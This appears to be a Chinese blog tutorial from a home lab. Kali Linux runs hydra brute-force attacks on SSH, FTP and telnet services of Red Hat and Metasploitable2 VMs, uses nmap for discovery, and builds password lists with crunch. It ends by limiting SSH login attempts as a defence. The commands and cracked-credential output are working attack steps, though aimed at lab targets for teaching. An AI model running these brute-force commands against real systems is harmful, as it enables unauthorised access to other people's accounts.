实验准备
软件:VMware Workstation Pro
虚拟机:kali linux 2022,Metasploitable2-Linux,Red Hat Enterprise Linux 7 服务器
网络模式:NAT模式
需要在红帽上部署sshd服务,vsftpd服务
部署实验环境
Red Hat Enterprise Linux 7 服务器
[root@localhost 桌面]# ifconfig
eno16777736: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.13.131 netmask 255.255.255.0 broadcast 192.168.13.255
inet6 fe80::20c:29ff:feb8:5c2f prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:b8:5c:2f txqueuelen 1000 (Ethernet)
RX packets 1057 bytes 106442 (103.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 642 bytes 89679 (87.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 0 (Local Loopback)
RX packets 22 bytes 5210 (5.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 22 bytes 5210 (5.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
[root@localhost 桌面]# mkdir /mnt/cdrom
[root@localhost 桌面]# mount /dev/sr0 /mnt/cdrom/
mount: /dev/sr0 写保护,将以只读方式挂载
[root@localhost 桌面]# vim /etc/yum.repos.d/a.repo
[root@localhost 桌面]# cat /etc/yum.repos.d/a.repo
[a]
name=a
baseurl=file:///mnt/cdrom
enable=1
gpgcheck=0
[root@localhost 桌面]# yum repolist
已加载插件:langpacks, product-id, subscription-manager
This system is not registered to Red Hat Subscription Management. You can use subscription-manager to register.
a | 4.1 kB 00:00:00
(1/2): a/group_gz | 134 kB 00:00:00
(2/2): a/primary_db | 3.4 MB 00:00:00
源标识 源名称 状态
a a 4,305
repolist: 4,305
[root@localhost 桌面]# yum install vsftpd -y
[root@localhost 桌面]# systemctl start vsftpd
[root@localhost 桌面]# systemctl enable vsftpd
ln -s '/usr/lib/systemd/system/vsftpd.service' '/etc/systemd/system/multi-user.target.wants/vsftpd.service'
[root@localhost 桌面]# systemctl status vsftpd.service
vsftpd.service - Vsftpd ftp daemon
Loaded: loaded (/usr/lib/systemd/system/vsftpd.service; enabled)
Active: active (running) since 四 2024-05-23 09:12:12 CST; 9s ago
Main PID: 4730 (vsftpd)
CGroup: /system.slice/vsftpd.service
└─4730 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
5月 23 09:12:12 localhost.localdomain systemd[1]: Started Vsftpd ftp daemon.
[root@localhost 桌面]# systemctl status sshd.service
sshd.service - OpenSSH server daemon
Loaded: loaded (/usr/lib/systemd/system/sshd.service; enabled)
Active: active (running) since 四 2024-05-23 08:10:25 CST; 1h 2min ago
Main PID: 1734 (sshd)
CGroup: /system.slice/sshd.service
└─1734 /usr/sbin/sshd -D
[root@localhost 桌面]# systemctl list-unit-files | grep ftp
vsftpd.service enabled
vsftpd@.service disabled
vsftpd.target disabled
[root@localhost 桌面]# systemctl list-unit-files | grep ssh
anaconda-sshd.service static
sshd-keygen.service static
sshd.service enabled
sshd@.service static
sshd.socket disabled
[root@localhost 桌面]# ping 192.168.13.1 -c4
PING 192.168.13.1 (192.168.13.1) 56(84) bytes of data.
64 bytes from 192.168.13.1: icmp_seq=1 ttl=128 time=0.108 ms
64 bytes from 192.168.13.1: icmp_seq=2 ttl=128 time=0.118 ms
64 bytes from 192.168.13.1: icmp_seq=3 ttl=128 time=0.103 ms
64 bytes from 192.168.13.1: icmp_seq=4 ttl=128 time=0.112 ms
--- 192.168.13.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3002ms
rtt min/avg/max/mdev = 0.103/0.110/0.118/0.009 ms
环境部署完成。
身份认证攻击
九头蛇hydra
kali linux 2022
hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。
──(root㉿hnsw)-[~]
└─# hydra -h
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-r use a non-random shuffling method for option -x
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-K do not redo failed attempts (good for -M mass scanning)
-q do not print messages about connection errors
-U service module usage details
-m OPT options specific for a module, see -U output for information
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cobaltstrike cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp ncp oracle sapr3 smb2.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
使用方法
语法:Hydra 参数 IP 服务
参数:
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。
测试前我们需要创建两个字典文件,
┌──(root㉿hnsw)-[/opt]
└─# cat username.txt
aaa
bbb
msfadmin
user
student
abc
┌──(root㉿hnsw)-[/opt]
└─# cat pws.txt
abcde
fdf
dfkdfk
redhat
dkdkk
msfadmin
使用命令开始爆破:
┌──(root㉿hnsw)-[/opt]
└─# hydra 192.168.13.131 ssh -L username.txt -P pws.txt -t 2 -v -e ns
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 10:50:16
[DATA] max 2 tasks per 1 server, overall 2 tasks, 35 login tries (l:5/p:7), ~18 tries per task
[DATA] attacking ssh://192.168.13.131:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://aaa@192.168.13.131:22
[INFO] Successful, password authentication is supported by ssh://192.168.13.131:22
[22][ssh] host: 192.168.13.131 login: student password: redhat
[STATUS] attack finished for 192.168.13.131 (waiting for children to complete tests)
[STATUS] 35.00 tries/min, 35 tries in 00:01h, 1 to do in 00:01h, 1 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-23 10:51:45
可以看到爆破出来了用户student及密码redhat,
该命令即对目标IP为192.168.13.131的主机SSH协议指定用户的用户名字典为username.txt,指定密码字典为psw.txt, 同时运行的线程数为2并显示详细过程,额外进行空密码试探,及使用指定账户和密码试探。
开启靶机Metasploitable2-Linux。
主机发现
┌──(root㉿hnsw)-[/opt]
└─# nmap -sn 192.168.13.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-23 10:57 CST
Nmap scan report for 192.168.13.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.13.2
Host is up (0.000076s latency).
MAC Address: 00:50:56:E9:9A:74 (VMware)
Nmap scan report for 192.168.13.130
Host is up (0.00011s latency).
MAC Address: 00:0C:29:8B:16:D6 (VMware)
Nmap scan report for 192.168.13.131
Host is up (0.000086s latency).
MAC Address: 00:0C:29:B8:5C:2F (VMware)
Nmap scan report for 192.168.13.132
Host is up (0.000077s latency).
MAC Address: 00:0C:29:DD:7C:41 (VMware)
Nmap scan report for 192.168.13.254
Host is up (0.000067s latency).
MAC Address: 00:50:56:F5:D4:6C (VMware)
Nmap scan report for 192.168.13.129
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 20.99 seconds
存活主机操作系统识别,确认靶机IP为192.168.13.130
┌──(root㉿hnsw)-[/opt]
└─# nmap -O 192.168.13.130-132
Starting Nmap 7.93 ( https://nmap.org ) at 2024-05-23 10:58 CST
Nmap scan report for 192.168.13.130
Host is up (0.00069s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:8B:16:D6 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Nmap scan report for 192.168.13.131
Host is up (0.00014s latency).
Not shown: 987 filtered tcp ports (no-response), 12 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:B8:5C:2F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13, Linux 3.4 - 3.10
Network Distance: 1 hop
Nmap scan report for 192.168.13.132
Host is up (0.00034s latency).
Not shown: 987 filtered tcp ports (no-response), 12 filtered tcp ports (host-prohibited)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:DD:7C:41 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13, Linux 3.4 - 3.10
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 18.45 seconds
对靶机上的FTP服务及telnet服务进行爆破。
┌──(root㉿hnsw)-[/opt]
└─# hydra 192.168.13.130 ftp -L username.txt -P pws.txt -t 2 -v -e ns
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 11:01:56
[DATA] max 2 tasks per 1 server, overall 2 tasks, 48 login tries (l:6/p:8), ~24 tries per task
[DATA] attacking ftp://192.168.13.130:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[21][ftp] host: 192.168.13.130 login: msfadmin password: msfadmin
[21][ftp] host: 192.168.13.130 login: user password: user
[STATUS] attack finished for 192.168.13.130 (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-23 11:02:51
┌──(root㉿hnsw)-[/opt]
└─# ftp 192.168.13.130
Connected to 192.168.13.130.
220 (vsFTPd 2.3.4)
Name (192.168.13.130:root): user
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bye
221 Goodbye.
┌──(root㉿hnsw)-[/opt]
└─# ftp 192.168.13.130
Connected to 192.168.13.130.
220 (vsFTPd 2.3.4)
Name (192.168.13.130:root): msfadmin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> exit
221 Goodbye.
ftp服务爆破出用户名msfadmin,user及密码msfadmin,user
使用爆破出的用户名及密码验证登录成功
┌──(root㉿hnsw)-[/opt]
└─# hydra 192.168.13.130 telnet -L username.txt -P pws.txt -t 2 -v -e ns
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 11:12:20
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 2 tasks per 1 server, overall 2 tasks, 48 login tries (l:6/p:8), ~24 tries per task
[DATA] attacking telnet://192.168.13.130:23/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[23][telnet] host: 192.168.13.130 login: msfadmin password: msfadmin
[23][telnet] host: 192.168.13.130 login: user password: user
[STATUS] 40.00 tries/min, 40 tries in 00:01h, 8 to do in 00:01h, 2 active
[STATUS] attack finished for 192.168.13.130 (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-23 11:13:38
telnet 服务爆破结果也一致。
字典文件
在上面的实验中不难发现,能否爆破出用户名和密码,字典文件username.txt、pws.txt至关重要。
在KALI中字典的来源有三种
一、使用字典生成工具来生成所需的字典
二、使用系统中自带的字典
三、从互联网上下载热门的字典
crunch
crunch是一种创建密码字典工具,按照指定的规则生成密码字典,可以灵活地制定自己的字典文件。使用crunch工具生成的密码可以输出到屏幕,保存到文件、或另一个程序。
基本语法
min:设定最小字符长度
max:设定最大字符长度
crunch [options]
-b:指定文件输出的大小,避免字典文件过大
-c:指定文件输出的行数,即包含密码的个数
-d:限制相同元素出现的次数
-e:定义停止字符,即到该字符串就停止生成
-f:调用库文件(/etc/share/crunch/charset.lst)
-i:改变输出格式,即aaa,aab -> aaa,baa
-I:通常与-t联合使用,表明该字符为实义字符
-m:通常与-p搭配
-o:将密码保存到指定文件
-p:指定元素以组合的方式进行
-q:读取密码文件,即读取pass.txt
-r:定义重某一字符串重新开始
-s:指定一个开始的字符,即从自己定义的密码xxxx开始
-t:指定密码输出的格式
-u:禁止打印百分比(必须为最后一个选项)
-z:压缩生成的字典文件,支持gzip,bzip2,lzma,7z
示例一:
crunch 5 6
#生成最小5位,最大6位,不选字符集默认是26个小写字母
示例二:
crunch 1 2 ab
#生成最小为1,最大为2 由a b为元素的所有组合
示例三:
crunch 1 2 ab -o a.txt
#生成最小为1,最大为2 由a b为元素的所有组合,指定将生成的字符串存入到 a.txt文档
示例四:
crunch 9 9 -t hnsw%%%%% -o b.txt
#生成一串由hnsw小写英文字母加五个任意数字组成的字符串,指定将生成的字符串存入到 b.txt文档
-t参数用于指定输出完整字符串的格式,后面跟的一些固定的字符和有特殊意义的字符,其中有特殊意义的字符对应具体用处如下:
@ 代表小写字母
, 代表大写字母
% 代表数字
^ 代表特殊字符
对一些喜欢使用姓名首字母+生日为密码的用户来说,
crunch 9 9 -t @@@%%%%% -o b.txt
该密码表包含了所有可能
示例五:
crunch 10 10 -t hnsw%%%%%% -o START -b 1mb
#生成一串由hnsw小写英文字母加六个任意数字组成的字符串,指定将生成的字符串存入到文档中,每个文档大小不超过1MB。
遇到字典特别大,需要限制每个字典文件大小的时候,可以使用-b参数:
示例六:
当确认字典中的字符串不存在两个连续字符连续的时候(例如是5位的两个中文拼音,中文拼音不会存在两个相同的拼音字符),可以使用-d参数,表示限制相同字符出现的次数,如果参数为1就表示不会出现连续两个相同的字符:,执行的命令为
crunch 5 5 -t @@@@@ -o START -d 1
示例七:
如果我们对目标比较熟悉,如我们看到某人的键盘上的QWERT和1234几个键磨损得比较厉害,也可以指定这几个字条来生成一个密码。还可以使用-c参数指定文件中字符串的个数(行数),执行的命令为
crunch 6 6 qwert1234 -o START -c 10000
密码破解速度对比图
所以一个安全密码应该如何去设置,这个图直观的表现出来了。
除了设置更安全的密码以外,限制最大密码尝试次数也是一种方法之一。
例如在红帽上设置SSH服务限制最大密码尝试次数为3.
[root@localhost home]# vim /etc/ssh/sshd_config
……
47 #LoginGraceTime 2m
48 PermitRootLogin yes
49 #StrictModes yes
50 MaxAuthTries 3
……
[root@localhost home]# systemctl restart sshd.service
使用另一台红帽克隆机远程登录输错三次密码后强制中断。
[root@localhost opt]# ssh 192.168.13.131
root@192.168.13.131’s password:
Permission denied, please try again.
root@192.168.13.131’s password:
Permission denied, please try again.
root@192.168.13.131’s password:
Received disconnect from 192.168.13.131: 2: Too many authentication failures for root
kali机尝试爆破,长时间得不到响应。虽然最终可以爆破出来用户名和密码但这是在用户名和密码字典数量较少的前提下才能爆破出来,若常规爆破,时间以几何数量增长。并且ssh服务还支持密钥验证登录方式,相比较密码验证该方式更为安全。
┌──(root㉿hnsw)-[/opt]
└─# hydra 192.168.13.131 ssh -L username.txt -P pws.txt -t 2 -v -e ns
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-23 11:37:38
[DATA] max 2 tasks per 1 server, overall 2 tasks, 48 login tries (l:6/p:8), ~24 tries per task
[DATA] attacking ssh://192.168.13.131:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://aaa@192.168.13.131:22
[INFO] Successful, password authentication is supported by ssh://192.168.13.131:22
[STATUS] 11.00 tries/min, 11 tries in 00:01h, 37 to do in 00:04h, 2 active
[STATUS] 8.00 tries/min, 16 tries in 00:02h, 32 to do in 00:05h, 2 active
扫一扫
534
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
